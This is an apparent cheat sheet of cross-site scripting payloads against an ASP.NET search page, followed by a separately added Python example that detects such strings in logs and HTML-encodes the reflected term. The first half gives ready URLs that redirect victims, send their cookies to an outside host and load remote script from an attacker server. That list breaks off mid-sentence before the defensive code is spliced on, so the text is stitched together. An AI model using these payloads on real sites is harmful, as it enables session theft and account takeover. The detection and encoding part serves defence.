ASP.NET Cross-Site Scripting (XSS) Attack Examples
Common attack code:
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
Redirection Attack
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.xxx.com")>
Cookie stealing
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(window.location=
"http://www.xxx.com/cookiemonster.php?sid="%2bdocument.cookie)>
Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild
(document.createElement("script")))>
</XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))>
where 'xss.js&
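
From the defender's side, the strings above share two traits: the reflected term parameter carries markup, and CSS comments split the word "expression" so a plain keyword match misses it. The following is an added example, not code from the original page; the function names, the heuristic rules and the second sample URL are assumptions made for illustration. It flags such requests in logs and shows the output encoding that makes the reflected value inert.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)           # /**/ and /*-*/ padding
CSS_EXPRESSION = re.compile(r"\bexpression\s*\(", re.I)
STYLE_ATTR = re.compile(r"style\s*=", re.I)


def term_findings(url, param="term"):
    """Return the reasons a reflected query value looks like markup injection."""
    findings = []
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for value in query.get(param, []):
        # Strip CSS comments first; otherwise "e/**/xpression" hides the keyword.
        flat = CSS_COMMENT.sub("", value)
        if "<" in value or ">" in value:
            findings.append("markup")
        if STYLE_ATTR.search(flat):
            findings.append("style-attribute")
        if CSS_EXPRESSION.search(flat):
            findings.append("css-expression")
    return findings


def render_results_heading(term):
    """Reflect the search term safely by HTML-encoding it on output."""
    # ASP.NET counterpart of html.escape: HttpUtility.HtmlEncode.
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


# Constructed sample requests: the first reuses the alert string listed above,
# the second is a benign search that mentions the same words.
SAMPLES = [
    "http://target/vuln-search.aspx?term="
    "</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>",
    "http://target/vuln-search.aspx?term=css+expression+tutorial",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(term_findings(sample) or "clean", sample)
    term = parse_qs(urlsplit(SAMPLES[0]).query)["term"][0]
    print(render_results_heading(term))
```

The detection rules are a log-triage heuristic only; the encoding in render_results_heading is what removes the vulnerability.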